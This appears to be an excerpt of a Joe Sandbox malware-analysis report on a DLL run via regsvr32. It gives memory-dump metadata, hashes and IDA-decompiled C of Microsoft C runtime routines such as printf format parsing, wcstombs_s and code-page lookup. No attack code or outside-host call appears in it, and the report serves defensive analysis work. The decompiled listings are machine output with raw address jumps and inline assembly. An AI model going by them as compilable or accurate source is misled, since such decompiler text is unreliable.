                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-192189897
                                    • Opcode ID: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                    • Instruction ID: ff5535f435e3edde8ece23b3de1a4987682526c6b5e3102cfdc31443931d3947
                                    • Opcode Fuzzy Hash: 9b0d14d024408deea39e0a17da6f412b88ec8238870ee572ebff0cd3a83ccddf
                                    • Instruction Fuzzy Hash: D9416B72A0DAC28AE3F0DB24E8947BEB7E4E380345F600126D2DD869A9DB3DD541CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 24%
                                    			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                    				void* _t113;
                                    				char* _t133;
                                    
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                    				_t133 =  &_a1560;
                                    				_a116 = E000007FE7FEF9D31E40(_t133);
                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3dddb;
                                    				_a116 = _t113 + _t133 - 0x30;
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}






                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2576288505-734865713
                                    • Opcode ID: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                    • Instruction ID: 23759b0de1675013ddf4d03c0cfaf8b870fc7ca6517f58e2c4ab95e624369fc8
                                    • Opcode Fuzzy Hash: e93e5a5da9d23810187a949f5699427fbde4a421f2c98764f5e18462d0498a04
                                    • Instruction Fuzzy Hash: E5415EB2A0C6C28AE7F09B64E8407BE72E4F384746F600125D6C9875E9DB3DD445CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_oneof_swprintf_p
                                    • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 2731067127-3604075083
                                    • Opcode ID: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                    • Instruction ID: 5622a3d1d015b06430e144c3880eb2afd9b3a378503d823bdd7d048160e8afa8
                                    • Opcode Fuzzy Hash: a5e89465a157929821ec7ea19f55365b45851ed2ed8ce63167a36004212f5177
                                    • Instruction Fuzzy Hash: BB413C72A0D7C186E7A49B51E8907AEBBA1F784740FA14126D6CD47BA9DB3ED404CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                    				void* _v16;
                                    				long long _v24;
                                    				long long _v32;
                                    				long long _v40;
                                    				long long _v48;
                                    				void* _v56;
                                    				signed int _v72;
                                    				long long _v80;
                                    				signed int _v88;
                                    				void* _t88;
                                    				void* _t89;
                                    				void* _t90;
                                    				void* _t92;
                                    				void* _t93;
                                    				void* _t101;
                                    				long long _t113;
                                    				intOrPtr _t116;
                                    				void* _t117;
                                    				long long _t118;
                                    				long long _t121;
                                    				long long _t122;
                                    				long long _t125;
                                    				void* _t164;
                                    
                                    				_t113 = __rax;
                                    				_a32 = r9d;
                                    				_a24 = __r8;
                                    				_a16 = __rdx;
                                    				_a8 = __rcx;
                                    				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
                                    				E000007FE7FEF9D2E680(_t79, _t113);
                                    				_v80 = _t113;
                                    				0xf9d24000();
                                    				_v56 = _t113 + 0x100;
                                    				 *_v56 =  *_v56 + 1;
                                    				if (_v88 == 0xffffffff) goto 0xf9d35103;
                                    				if (_v88 - _a32 <= 0) goto 0xf9d35103;
                                    				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
                                    				_t116 = _a24;
                                    				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
                                    				goto 0xf9d34fbe;
                                    				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
                                    				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                    				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                    				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                    				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                    				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
                                    				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
                                    				_v48 = _t118;
                                    				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
                                    				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                    				_v40 = _t121;
                                    				goto 0xf9d35041;
                                    				_v40 = 0;
                                    				if (_v40 == 0) goto 0xf9d350f4;
                                    				r9d = _v72;
                                    				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
                                    				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                    				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
                                    				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
                                    				_v32 = _t122;
                                    				E000007FE7FEF9D2E680(_t93, _t122);
                                    				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                    				_v24 = _t125;
                                    				goto 0xf9d350d2;
                                    				_v24 = 0;
                                    				r8d = 0x103;
                                    				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
                                    				goto 0xf9d350f6;
                                    				_v88 = _v72;
                                    				goto 0xf9d34f83;
                                    				0xf9d24000();
                                    				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
                                    				0xf9d24000();
                                    				_v16 = _t125 + 0x100;
                                    				 *_v16 =  *_v16 - 1;
                                    				if (_v88 == 0xffffffff) goto 0xf9d3514a;
                                    				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
                                    				_t101 = E000007FE7FEF9D2CF80(_v16);
                                    				r9d = _v88;
                                    				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                    • String ID:
                                    • API String ID: 2452617236-0
                                    • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                    • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                    • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                    • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                    				long long _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				int _v28;
                                    				int _v32;
                                    				char _v64;
                                    				long long _v72;
                                    				intOrPtr _t29;
                                    				intOrPtr* _t41;
                                    
                                    				_t41 = __rax;
                                    				_a8 = __ecx;
                                    				_v16 = 0xfffffffe;
                                    				_v72 = 0;
                                    				0xf9d266b0();
                                    				 *0xf9d4cd68 = 0;
                                    				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
                                    				 *0xf9d4cd68 = 1;
                                    				_v32 = GetOEMCP();
                                    				E000007FE7FEF9D26800( &_v64);
                                    				goto 0xf9d29fe3;
                                    				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
                                    				 *0xf9d4cd68 = 1;
                                    				_v28 = GetACP();
                                    				E000007FE7FEF9D26800( &_v64);
                                    				_t29 = _v28;
                                    				goto 0xf9d29fe3;
                                    				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
                                    				 *0xf9d4cd68 = 1;
                                    				E000007FE7FEF9D26840(_t29,  &_v64);
                                    				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                    				E000007FE7FEF9D26800( &_v64);
                                    				goto 0xf9d29ff9;
                                    				_v20 = _a8;
                                    				E000007FE7FEF9D26800( &_v64);
                                    				return _v20;
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_
                                    • String ID:
                                    • API String ID: 1901436342-0
                                    • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                    • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                    • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                    • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                    • API String ID: 2123368286-552404435
                                    • Opcode ID: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                    • Instruction ID: b798cd5c2606ce723a50a96b999359d63c775ee68ba37fd19eb3efa8b303dc8f
                                    • Opcode Fuzzy Hash: 2c731414488d35c21f2780f328146d5dcf70469cadf2ee42e60feab36cc6bb66
                                    • Instruction Fuzzy Hash: C2511936A0DBC586E6B48B19E84476EB3E0F386761F204225D6ED43BE8DF7ED4458B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                    				void* _t184;
                                    				char* _t204;
                                    				char* _t205;
                                    
                                    				_a112 = 0;
                                    				_a108 = _a112;
                                    				_a88 = _a108;
                                    				_a92 = _a88;
                                    				_a80 = 0;
                                    				_a116 = 0xffffffff;
                                    				_a76 = 0;
                                    				_a968 = _a696 & 0x000000ff;
                                    				if (_a968 == 0x20) goto 0xf9d3bd57;
                                    				if (_a968 == 0x23) goto 0xf9d3bd64;
                                    				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                    				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                    				if (_a968 == 0x30) goto 0xf9d3bd72;
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000004;
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000001;
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000002;
                                    				goto 0xf9d3bd7d;
                                    				asm("bts eax, 0x7");
                                    				goto 0xf9d3bd7d;
                                    				_a80 = _a80 | 0x00000008;
                                    				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                    				_t204 =  &_a1112;
                                    				_a88 = E000007FE7FEF9D31E40(_t204);
                                    				if (_a88 >= 0) goto 0xf9d3bdbc;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3bdd5;
                                    				_a88 = _t184 + _t204 - 0x30;
                                    				_a116 = 0;
                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                    				_t205 =  &_a1112;
                                    				_a116 = E000007FE7FEF9D31E40(_t205);
                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3be2d;
                                    				_a116 = _t184 + _t205 - 0x30;
                                    				_a972 = _a696 & 0x000000ff;
                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                    				goto 0xf9d3bfd9;
                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                    				_a1096 = _a1096 + 1;
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3beb2;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xf");
                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                    				_a1096 = _a1096 + 2;
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                    				_a1096 = _a1096 + 2;
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3bfbe;
                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                    				goto 0xf9d3bfbe;
                                    				_a704 = 0;
                                    				goto E000007FE7FEF9D3BB66;
                                    				goto 0xf9d3bfd9;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3bfd9;
                                    				asm("bts eax, 0xb");
                                    				_a976 = _a696;
                                    				_a976 = _a976 - 0x41;
                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                    				goto __rax;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-192189897
                                    • Opcode ID: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                    • Instruction ID: aadf3acbccf6ff41cc1b37cb3268d324d4900ab85ae7fa80aabce8c8f65e01df
                                    • Opcode Fuzzy Hash: 6e7b2e4602a67de0d8444751781932987c77aea524c4ee0e513499fa92d069a1
                                    • Instruction Fuzzy Hash: 13414C72A0D6C28AE3B0DB24E8547BEB7E4E385345F600126D6D987AA9DB7DD541CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                    				void* _t184;
                                    				char* _t204;
                                    				char* _t205;
                                    
                                    				_a112 = 0;
                                    				_a108 = _a112;
                                    				_a88 = _a108;
                                    				_a92 = _a88;
                                    				_a80 = 0;
                                    				_a116 = 0xffffffff;
                                    				_a76 = 0;
                                    				_a1404 = _a1208 & 0x0000ffff;
                                    				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                    				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                    				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                    				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                    				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000004;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000001;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000002;
                                    				goto 0xf9d3dd2b;
                                    				asm("bts eax, 0x7");
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000008;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                    				_t204 =  &_a1560;
                                    				_a88 = E000007FE7FEF9D31E40(_t204);
                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                    				_a80 = _a80 | 0x00000004;
                                    				_a88 =  ~_a88;
                                    				goto 0xf9d3dd83;
                                    				_a88 = _t184 + _t204 - 0x30;
                                    				_a116 = 0;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                    				_t205 =  &_a1560;
                                    				_a116 = E000007FE7FEF9D31E40(_t205);
                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                    				_a116 = 0xffffffff;
                                    				goto 0xf9d3dddb;
                                    				_a116 = _t184 + _t205 - 0x30;
                                    				_a1408 = _a1208 & 0x0000ffff;
                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                    				goto 0xf9d3df88;
                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                    				_a1544 =  &(_a1544[1]);
                                    				asm("bts eax, 0xc");
                                    				goto 0xf9d3de61;
                                    				_a80 = _a80 | 0x00000010;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xf");
                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("bts eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                    				_a1544 =  &(_a1544[2]);
                                    				asm("btr eax, 0xf");
                                    				goto 0xf9d3df6d;
                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                    				goto 0xf9d3df6d;
                                    				_a1216 = 0;
                                    				goto E000007FE7FEF9D3DC41;
                                    				goto 0xf9d3df88;
                                    				_a80 = _a80 | 0x00000020;
                                    				goto 0xf9d3df88;
                                    				asm("bts eax, 0xb");
                                    				_a1412 = _a1208 & 0x0000ffff;
                                    				_a1412 = _a1412 - 0x41;
                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                    				goto __rax;
                                    			}







                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2192614184-734865713
                                    • Opcode ID: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                    • Instruction ID: e7137eedf57618a3e563147601a49a8da4cfcefd457897bce2b88a2abc432a47
                                    • Opcode Fuzzy Hash: f70cefb569721d9d21904d9e7ba8b3a65f1b1d02a652e36c9b8a6a51e541d649
                                    • Instruction Fuzzy Hash: 7E411CB2A0C6C18AE7B0CB64E8447BEB7E0F384349F600125E6D987AA9D77DD445CF14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E000007FE7FEF9D3DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
                                    				void* _t190;
                                    				char* _t210;
                                    				char* _t211;
                                    
                                    				_a76 = 1;
                                    				E000007FE7FEF9D3EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
                                    				_a112 = 0;
                                    				_a108 = _a112;
                                    				_a88 = _a108;
                                    				_a92 = _a88;
                                    				_a80 = 0;
                                    				_a116 = 0xffffffff;
                                    				_a76 = 0;
                                    				_a1404 = _a1208 & 0x0000ffff;
                                    				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                    				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                    				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                    				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                    				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000004;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000001;
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000002;
                                    				goto 0xf9d3dd2b;
                                    				asm("bts eax, 0x7");
                                    				goto 0xf9d3dd2b;
                                    				_a80 = _a80 | 0x00000008;
                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                    				_t210 =  &_a1560;
